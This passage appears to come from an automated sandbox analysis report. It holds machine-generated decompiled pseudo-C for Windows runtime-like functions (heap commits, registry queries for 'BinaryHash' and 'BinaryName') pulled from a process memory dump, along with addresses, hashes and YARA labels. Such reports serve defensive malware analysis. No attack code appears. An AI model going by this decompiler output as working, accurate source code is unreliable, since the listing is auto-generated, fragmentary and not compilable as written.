					_t80 = E055E9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0566A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0566A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x5698b04 >> 0x14) + (_v44 -  *0x5698b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E055C7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0566138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E055C7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0565FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x5698724 & 0x00000008) != 0) {
						E056652F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E056715B5(0x5698ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                        0x05670eb7
                                                                        0x05670eb9
                                                                        0x05670ec0
                                                                        0x05670ec2
                                                                        0x05670ecd
                                                                        0x0567105b
                                                                        0x0567105b
                                                                        0x05671061
                                                                        0x05671066
                                                                        0x05671066
                                                                        0x0567106b
                                                                        0x05671073
                                                                        0x05671073
                                                                        0x05670ed3
                                                                        0x05670ed6
                                                                        0x05670edc
                                                                        0x05670ee0
                                                                        0x05670ee7
                                                                        0x05670ef0
                                                                        0x05670ef5
                                                                        0x05670efa
                                                                        0x05670efc
                                                                        0x05670efd
                                                                        0x05670f03
                                                                        0x05670f04
                                                                        0x05670f06
                                                                        0x05670f07
                                                                        0x05670f09
                                                                        0x05670f0e
                                                                        0x05670f14
                                                                        0x05670f23
                                                                        0x05670f2d
                                                                        0x05670f34
                                                                        0x05670f34
                                                                        0x05670f14
                                                                        0x05670f52
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05670f58
                                                                        0x05670f73
                                                                        0x05670f74
                                                                        0x05670f79
                                                                        0x05670f7d
                                                                        0x05670f80
                                                                        0x05670f86
                                                                        0x05670fab
                                                                        0x05670fb5
                                                                        0x05670fc6
                                                                        0x05670fd1
                                                                        0x05670fe3
                                                                        0x05670fd3
                                                                        0x05670fdc
                                                                        0x05670fdc
                                                                        0x05670feb
                                                                        0x05671009
                                                                        0x05671009
                                                                        0x05671015
                                                                        0x05671027
                                                                        0x05671017
                                                                        0x05671020
                                                                        0x05671020
                                                                        0x0567102f
                                                                        0x0567103c
                                                                        0x0567103c
                                                                        0x05671048
                                                                        0x05671050
                                                                        0x05671050
                                                                        0x05671055
                                                                        0x00000000
                                                                        0x05671055
                                                                        0x05670f88
                                                                        0x05670f9e
                                                                        0x05670fa2
                                                                        0x05670fa9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05670fa9
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `
                                                                        • API String ID: 0-2679148245
                                                                        • Opcode ID: 054a36010681aaaf4c1021a02a206ab8d1b1cd41188b32576fa6ecd0ca862a96
                                                                        • Instruction ID: 4097fdce6dbd410224fd39abd7d8adb240ec8bf4949b02b9139ea36c2d9d7204
                                                                        • Opcode Fuzzy Hash: 054a36010681aaaf4c1021a02a206ab8d1b1cd41188b32576fa6ecd0ca862a96
                                                                        • Instruction Fuzzy Hash: 6651AD702083869FD325DF28D888B1BBBE5FBC5314F04092DF99697790DA34E906CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055DF0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 75%
                                                                        			E055DF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E055C4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E055E9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E055E9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E055E95D0();
							goto L11;
						} else {
							_t109 = L055C4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E055EF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E055E95D0();
										L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                        0x055df0d3
                                                                        0x055df0d9
                                                                        0x055df0e0
                                                                        0x055df0e7
                                                                        0x055df0f2
                                                                        0x055df0f4
                                                                        0x055df0f8
                                                                        0x055df100
                                                                        0x055df108
                                                                        0x055df10d
                                                                        0x055df115
                                                                        0x055df116
                                                                        0x055df11f
                                                                        0x055df123
                                                                        0x055df124
                                                                        0x055df12c
                                                                        0x055df130
                                                                        0x055df134
                                                                        0x055df13d
                                                                        0x055df144
                                                                        0x055df14b
                                                                        0x055df152
                                                                        0x0561bab0
                                                                        0x0561bab0
                                                                        0x055df158
                                                                        0x055df158
                                                                        0x055df15a
                                                                        0x055df160
                                                                        0x055df165
                                                                        0x055df166
                                                                        0x055df16f
                                                                        0x055df173
                                                                        0x0561baa7
                                                                        0x0561baa7
                                                                        0x0561baab
                                                                        0x00000000
                                                                        0x055df179
                                                                        0x055df18d
                                                                        0x055df191
                                                                        0x0561baa2
                                                                        0x00000000
                                                                        0x055df197
                                                                        0x055df19b
                                                                        0x055df1a2
                                                                        0x055df1a9
                                                                        0x055df1af
                                                                        0x055df1b2
                                                                        0x055df1b6
                                                                        0x055df1b9
                                                                        0x055df1c4
                                                                        0x055df1d8
                                                                        0x055df1df
                                                                        0x055df1e3
                                                                        0x055df1eb
                                                                        0x055df1ee
                                                                        0x055df1f4
                                                                        0x055df20f
                                                                        0x0561bab7
                                                                        0x0561babb
                                                                        0x0561bacc
                                                                        0x0561bad1
                                                                        0x055df215
                                                                        0x055df218
                                                                        0x055df226
                                                                        0x055df22b
                                                                        0x00000000
                                                                        0x055df22b
                                                                        0x055df1f6
                                                                        0x055df1f6
                                                                        0x055df1f9
                                                                        0x055df1fb
                                                                        0x055df1fb
                                                                        0x055df1f4
                                                                        0x055df191
                                                                        0x055df173
                                                                        0x055df152
                                                                        0x055df203

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                        • Instruction ID: 50e67fc317e8c3d516a6695aa92c45a5e2647cb8fe859c16469132449573e90c
                                                                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                        • Instruction Fuzzy Hash: 61518F72604711AFC321DF69C840A67BBF5FF88710F00892EF99687660E7B4E904CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05623540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 75%
                                                                        			E05623540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x569d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E055E0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E05623706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E055EFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E05623540;
						E055EFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E055FDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E05630C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E055E97C0();
					}
					return E055EB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E05623971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E05623884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E055EFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E055E9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E05623787(_a4,  &_v352, _t80);
						}
					}
					L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E055E95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                        0x05623552
                                                                        0x0562355a
                                                                        0x0562355d
                                                                        0x05623566
                                                                        0x05623567
                                                                        0x0562357e
                                                                        0x0562358f
                                                                        0x056235a1
                                                                        0x056235a5
                                                                        0x0562366b
                                                                        0x0562366b
                                                                        0x0562366d
                                                                        0x05623672
                                                                        0x05623679
                                                                        0x05623685
                                                                        0x0562368d
                                                                        0x0562369d
                                                                        0x056236a7
                                                                        0x056236b8
                                                                        0x056236c6
                                                                        0x056236c7
                                                                        0x056236dc
                                                                        0x056236e1
                                                                        0x056236e7
                                                                        0x056236e9
                                                                        0x056236e9
                                                                        0x05623703
                                                                        0x05623703
                                                                        0x056235b5
                                                                        0x056235c0
                                                                        0x056235c4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056235ca
                                                                        0x056235d7
                                                                        0x056235e2
                                                                        0x056235e6
                                                                        0x056235e8
                                                                        0x056235f5
                                                                        0x056235fa
                                                                        0x05623603
                                                                        0x05623604
                                                                        0x05623609
                                                                        0x0562360a
                                                                        0x05623612
                                                                        0x05623613
                                                                        0x0562361e
                                                                        0x05623622
                                                                        0x05623628
                                                                        0x0562362f
                                                                        0x0562362f
                                                                        0x05623636
                                                                        0x05623638
                                                                        0x0562363b
                                                                        0x05623642
                                                                        0x05623642
                                                                        0x05623636
                                                                        0x05623657
                                                                        0x05623657
                                                                        0x0562365c
                                                                        0x05623662
                                                                        0x05623669
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryHash
                                                                        • API String ID: 0-2202222882
                                                                        • Opcode ID: 96c4a5f3c559fd336051fb49e5956461adbe5fb402d9053a57f5cd464914f7df
                                                                        • Instruction ID: 148ae6e362ca3a3763efb06363e161a97048df51f5d2d909ceec1dbd84ad1e98
                                                                        • Opcode Fuzzy Hash: 96c4a5f3c559fd336051fb49e5956461adbe5fb402d9053a57f5cd464914f7df
                                                                        • Instruction Fuzzy Hash: 574115F1E0052D9BDF21DA50CC85FEEB77CAB45714F0085A5EA09AB240DB349E89CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 056705AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E056705AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E056707DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E055E9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0566A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0566A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E05671293(_t79, _v40, E056707DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E055C7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0566138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                        0x056705c5
                                                                        0x056705ca
                                                                        0x056705d3
                                                                        0x056706db
                                                                        0x056706db
                                                                        0x056706dd
                                                                        0x056706e3
                                                                        0x056706e3
                                                                        0x056705dd
                                                                        0x056705e7
                                                                        0x056705f6
                                                                        0x05670600
                                                                        0x05670607
                                                                        0x05670610
                                                                        0x05670615
                                                                        0x0567061a
                                                                        0x0567061c
                                                                        0x0567061e
                                                                        0x05670624
                                                                        0x05670625
                                                                        0x05670627
                                                                        0x05670628
                                                                        0x05670631
                                                                        0x05670640
                                                                        0x0567064d
                                                                        0x05670654
                                                                        0x05670654
                                                                        0x05670631
                                                                        0x0567066d
                                                                        0x05670674
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05670692
                                                                        0x0567069e
                                                                        0x056706b0
                                                                        0x056706a0
                                                                        0x056706a9
                                                                        0x056706a9
                                                                        0x056706b8
                                                                        0x056706d6
                                                                        0x056706d6
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `
                                                                        • API String ID: 0-2679148245
                                                                        • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                        • Instruction ID: 2a57e14a49b8973a176cfc3297b913eb0dab324acc3624b0430fb091c157e867
                                                                        • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                        • Instruction Fuzzy Hash: 18311332304309ABE720DE25CC58F9777D9FBC4764F144229F955EB680D670E944CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05623884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E05623884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E055E9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L055C4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E055E9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                        0x05623893
                                                                        0x05623896
                                                                        0x05623899
                                                                        0x0562389f
                                                                        0x056238a0
                                                                        0x056238a4
                                                                        0x056238a9
                                                                        0x056238ac
                                                                        0x056238ad
                                                                        0x056238ae
                                                                        0x056238af
                                                                        0x056238b1
                                                                        0x056238b4
                                                                        0x056238bb
                                                                        0x056238bc
                                                                        0x056238bd
                                                                        0x056238c4
                                                                        0x056238c8
                                                                        0x056238ca
                                                                        0x056238ca
                                                                        0x056238d5
                                                                        0x0562393e
                                                                        0x05623940
                                                                        0x05623942
                                                                        0x05623952
                                                                        0x05623954
                                                                        0x05623961
                                                                        0x05623961
                                                                        0x05623967
                                                                        0x0562396e
                                                                        0x0562396e
                                                                        0x05623947
                                                                        0x0562394c
                                                                        0x00000000
                                                                        0x0562394c
                                                                        0x056238ea
                                                                        0x056238ee
                                                                        0x056238f8
                                                                        0x056238f9
                                                                        0x056238ff
                                                                        0x05623900
                                                                        0x05623902
                                                                        0x05623903
                                                                        0x0562390b
                                                                        0x0562390f
                                                                        0x05623950
                                                                        0x00000000
                                                                        0x05623950
                                                                        0x05623915
                                                                        0x0562391d
                                                                        0x0562391d
                                                                        0x05623922
                                                                        0x05623926
                                                                        0x00000000
                                                                        0x05623928
                                                                        0x0562392b
                                                                        0x0562392b
                                                                        0x05623935
                                                                        0x05623937
                                                                        0x05623937
                                                                        0x00000000
                                                                        0x05623935
                                                                        0x05623926
                                                                        0x056238f0
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryName
                                                                        • API String ID: 0-215506332
                                                                        • Opcode ID: e7c638e6659f97c614bdccecda20819b4328470d170b8f319de925210df48b26
                                                                        • Instruction ID: 91aaf1f56b8c05f67f5e8bc0960900ace1614c3fa7f06536c47c9fdf260a1464
                                                                        • Opcode Fuzzy Hash: e7c638e6659f97c614bdccecda20819b4328470d170b8f319de925210df48b26
                                                                        • Instruction Fuzzy Hash: 25313532E0092AAFDB15DA58C945E7BB7B5FB81B20F014569E914A7740E7349E00CFE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055DD294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 33%
                                                                        			E055DD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x569d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E055C4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E055EB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E055E98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E055E95D0();
					L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                        0x055dd29c
                                                                        0x055dd2a6
                                                                        0x055dd2b1
                                                                        0x055dd2b5
                                                                        0x055dd2b6
                                                                        0x055dd2bc
                                                                        0x055dd2bd
                                                                        0x055dd2be
                                                                        0x055dd2bf
                                                                        0x055dd2c2
                                                                        0x055dd2c4
                                                                        0x055dd2cc
                                                                        0x055dd384
                                                                        0x055dd34b
                                                                        0x055dd34f
                                                                        0x055dd350
                                                                        0x055dd351
                                                                        0x055dd35c
                                                                        0x055dd35c
                                                                        0x055dd2d6
                                                                        0x055dd2da
                                                                        0x055dd2e1
                                                                        0x055dd361
                                                                        0x055dd369
                                                                        0x055dd36d
                                                                        0x055dd2e3
                                                                        0x055dd2e3
                                                                        0x055dd2e3
                                                                        0x055dd2e5
                                                                        0x055dd2ed
                                                                        0x055dd2f5
                                                                        0x055dd2fa
                                                                        0x055dd302
                                                                        0x055dd303
                                                                        0x055dd30b
                                                                        0x055dd30f
                                                                        0x055dd313
                                                                        0x055dd318
                                                                        0x055dd31c
                                                                        0x055dd320
                                                                        0x055dd379
                                                                        0x055dd37d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0561affe
                                                                        0x0561b001
                                                                        0x0561b011
                                                                        0x00000000
                                                                        0x055dd322
                                                                        0x055dd322
                                                                        0x055dd330
                                                                        0x055dd337
                                                                        0x055dd35d
                                                                        0x055dd339
                                                                        0x055dd33f
                                                                        0x055dd38c
                                                                        0x055dd38c
                                                                        0x055dd33f
                                                                        0x055dd349
                                                                        0x00000000
                                                                        0x055dd349

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: 7cc9c2e4c2bfbaf033cd2850f3458fec5a2667d91372afde87b833ad47a7f571
                                                                        • Instruction ID: 92b3d5b6262d1dd7507b07188c8b9f0f44aaae08454695da87f18d2ab8f6ae27
                                                                        • Opcode Fuzzy Hash: 7cc9c2e4c2bfbaf033cd2850f3458fec5a2667d91372afde87b833ad47a7f571
                                                                        • Instruction Fuzzy Hash: B9317AB6608305AFC721DF28C984A6BFBF9FBC9654F40092EF99583210D634DD05CBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055B1B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E055B1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E055EBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E055EA9B0();
						if(_t30 >= 0) {
